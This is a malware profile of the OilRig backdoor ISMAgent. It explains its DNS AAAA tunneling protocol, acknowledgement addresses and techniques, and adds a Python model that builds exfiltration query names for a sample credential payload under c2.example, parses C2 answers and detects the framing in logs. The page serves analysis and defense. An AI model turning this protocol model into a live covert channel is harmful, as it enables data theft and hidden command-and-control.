ISMAgent
ISMAgent is a backdoor attributed to OilRig. Its primary command-and-control channel is HTTP; when the HTTP C2 is unreachable it falls back to DNS tunneling. The DNS channel is built on AAAA queries issued through the Windows DnsQuery_A API for specially crafted subdomains of an actor-controlled domain: outbound data rides in the queried names and inbound data rides in the IPv6 answers.

On start-up the Trojan generates a session identifier with CoCreateGuid, strips the hyphens from the GUID and embeds it in its beacon structure. System data is base64-encoded with a custom character substitution, split into 13-character chunks, sent one chunk per subdomain, and then terminated with an "n.<count>.f" query that tells the C2 how many chunks were sent. Two hardcoded IPv6 answers act as acknowledgements: a67d:0db8:a2a1:7334:7654:4325:0370:2aa3 signals that the C2 is ready, and a67d:0db8:85a3:4325:7654:8a2a:0370:7334 tells the Trojan to keep sending. If an answer begins with a67d:0db8:85a3:4325:7654, the last two hexadectets give the number of download queries the Trojan must issue to fetch the rest of the C2's data. Note that the "keep sending" acknowledgement itself begins with that prefix, so any reimplementation or detector has to match the exact acknowledgement values before testing the prefix. Commands arrive embedded in IPv6 answers; the published examples run a PowerShell script that writes to C:\Users\Public\file.txt and later upload that file's contents back through the DNS tunnel.

ISMAgent is one component of OilRig's wider toolset; the reporting behind this page also links OilRig to spear-phishing, supply chain attacks and DNS-tunneling tradecraft.
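The following is an added example written for this page; it is not ISMAgent's code and not from any vendor report. It models the DNS-tunnel framing described above from both sides: building the AAAA query names an agent would issue for an upload, interpreting the IPv6 answers (including the prefix-overlap caveat), and a detector that flags the same framing in resolver query logs. Taken from the description: the two acknowledgement addresses, the a67d:0db8:85a3:4325:7654 prefix, the 13-character chunk size and the n.<count>.f marker. Assumptions: the label order <chunk>.<index>.<session>.<domain>, the base64 substitution alphabet, uuid4 standing in for CoCreateGuid, reading the last two hexadectets as one 32-bit integer, the domain c2.example, and the sample log lines, all of which are constructed.

```python
import base64
import ipaddress
import re
import uuid
from collections import defaultdict
from typing import Optional

# Constants quoted from the description above.
ACK_READY = "a67d:0db8:a2a1:7334:7654:4325:0370:2aa3"     # C2 ready
ACK_CONTINUE = "a67d:0db8:85a3:4325:7654:8a2a:0370:7334"  # keep sending
DOWNLOAD_PREFIX = "a67d:0db8:85a3:4325:7654"              # count in last two hexadectets
CHUNK_LEN = 13


def encode_payload(data: bytes) -> str:
    # Assumption: the page says characters are substituted but not which ones.
    # '+' -> '-', '/' -> '_' and dropped padding keep every label DNS-safe.
    b64 = base64.b64encode(data).decode()
    return b64.replace("+", "-").replace("/", "_").rstrip("=")


def decode_payload(text: str) -> bytes:
    # Inverse of encode_payload, for reassembling captured uploads.
    text = text.replace("-", "+").replace("_", "/")
    return base64.b64decode(text + "=" * (-len(text) % 4))


def new_session_id() -> str:
    # Windows code would call CoCreateGuid; uuid4 stands in (assumption).
    # Hyphens are stripped, as the description states.
    return str(uuid.uuid4()).replace("-", "")


def build_upload_queries(data: bytes, session_id: str, domain: str) -> list:
    """AAAA query names that carry `data` to the C2.
    Assumed layout: <chunk>.<index>.<session>.<domain>, closed by n.<count>.f."""
    enc = encode_payload(data)
    chunks = [enc[i:i + CHUNK_LEN] for i in range(0, len(enc), CHUNK_LEN)]
    names = [f"{c}.{i}.{session_id}.{domain}" for i, c in enumerate(chunks)]
    names.append(f"n.{len(chunks)}.f.{session_id}.{domain}")
    return names


def classify_answer(answer: str) -> Optional[str]:
    """Interpret one IPv6 answer. Exact acknowledgements are tested first:
    ACK_CONTINUE itself starts with DOWNLOAD_PREFIX, so prefix-first would misfire."""
    addr = ipaddress.IPv6Address(answer).exploded
    if addr == ACK_READY:
        return "ready"
    if addr == ACK_CONTINUE:
        return "continue"
    if addr.startswith(DOWNLOAD_PREFIX + ":"):
        return "download"
    return None


def download_query_count(answer: str) -> Optional[int]:
    """Number of download queries to issue, from the last two hexadectets.
    Assumption: the two hexadectets are read as one 32-bit big-endian integer."""
    if classify_answer(answer) != "download":
        return None
    h = ipaddress.IPv6Address(answer).exploded.split(":")
    return int(h[6] + h[7], 16)


# --- Detection side: the same framing as seen in resolver query logs ------
CHUNK_LABEL = re.compile(r"^[A-Za-z0-9_-]{13}$")
DONE_LABELS = re.compile(r"^n\.\d+\.f\.")


def flag_tunnel_clients(log_lines, min_chunks: int = 2) -> set:
    """Return (client, domain) pairs whose AAAA queries carry full 13-character
    chunk labels and an n.<count>.f marker. Lines are '<client> <qtype> <qname>';
    the registrable domain is approximated as the last two labels."""
    seen = defaultdict(lambda: {"chunks": 0, "done": False})
    for line in log_lines:
        client, qtype, qname = line.split()
        if qtype != "AAAA":
            continue
        labels = qname.rstrip(".").split(".")
        key = (client, ".".join(labels[-2:]))
        if CHUNK_LABEL.match(labels[0]):
            seen[key]["chunks"] += 1
        elif DONE_LABELS.match(qname):
            seen[key]["done"] = True
    return {k for k, v in seen.items() if v["done"] and v["chunks"] >= min_chunks}


# Constructed sample: two benign lookups plus one host uploading a short payload.
SESSION = "3f2504e04f8911d39a0c0305e82c3301"  # constructed, hyphen-stripped GUID form
SAMPLE_QUERIES = build_upload_queries(b"WORKSTATION\\alice:pass", SESSION, "c2.example")
SAMPLE_LOG = ["10.0.0.5 A www.example.com", "10.0.0.5 AAAA mail.example.com"] + [
    f"10.0.0.7 AAAA {q}" for q in SAMPLE_QUERIES
]

if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        print(q)
    print(classify_answer(ACK_CONTINUE),
          download_query_count("a67d:0db8:85a3:4325:7654:0000:0000:0003"))
    print(flag_tunnel_clients(SAMPLE_LOG))
```

The detector keys on the two things the description fixes regardless of encoder details: a run of exactly-13-character labels and the n.<count>.f terminator under one domain. It deliberately ignores the short final chunk, so set min_chunks with the beacon size in mind; a 13-character benign hostname alone never trips it because the terminator is also required.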
Groups observed using it
2 distinct threat actors attributed by public researchers.
ISMAgent uses the DnsQuery_A API function to issue DNS AAAA requests to resolve custom crafted subdomains at an actor owned domain to send data to and receive commands from OilRig.
Techniques & procedures
6 distinct techniques documented for this family, grouped by tactic.
Execution
1 technique. Evidence: "The Helminth Trojan came in two forms, a portable executable version and a PowerShell version"; "...ISMAgent... would run a PowerShell script..."; "QUADAGENT... obtain a PowerShell script that it will replace itself with"; "BONDUPDATER... download a new PowerShell... script"
Stealth
1 technique. Evidence: "The two encoding methods used by these tools... base16 and base64"; "...custom base64 encoder to strip out non-alphanumeric characters"; "...encoding mechanism... splits each hexadecimal byte into two nibbles..."
Discovery
2 techniques. Evidence: "The Trojan will first create a unique system identifier by executing the 'whoami' command"; "...base64 encoded computername\username"
"ALMA... gathering the user name and windows product key"; "...dot variant also gathers the computer name and the serial number of '\\.\PhysicalDrive'"; "...send system specific data... <domain>\<username>:pass"
Command and Control
1 technique. Evidence: "Depending on the tool, A, AAAA, and TXT query types have been used by OilRig for tunneling" and "...use DNS queries to resolve specially crafted subdomains... and the answers... to receive data from the C2."; "...malware can use DNS queries and answers to act as a command and control channel... tools that rely on DNS tunneling used by an adversary known as OilRig."
Exfiltration
1 technique. Evidence: "...upload the results to the C2 via the DNS tunnel"; "...exfiltrate the contents of each file in this folder"; "...upload its contents to the C2 server"; "...transmitting data to the C2 in the queried subdomains"
IOCs tracked for this family
5 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
5 sources tracked across advisories, community write-ups, and news.
One source lists ISMAgent among the samples detected in its analysis without giving further detail.
Backdoor malware used by OilRig to support stealthy command and control operations.
DNS-tunneling trojan using AAAA queries (IPv6 answers) for C2. Uses a GUID-based session ID, uploads host/user info and file contents via base64-in-subdomain chunks, and receives commands/data encoded into IPv6 responses.
Falls back from HTTP-based C2 to DNS tunneling when HTTP C2 is unreachable.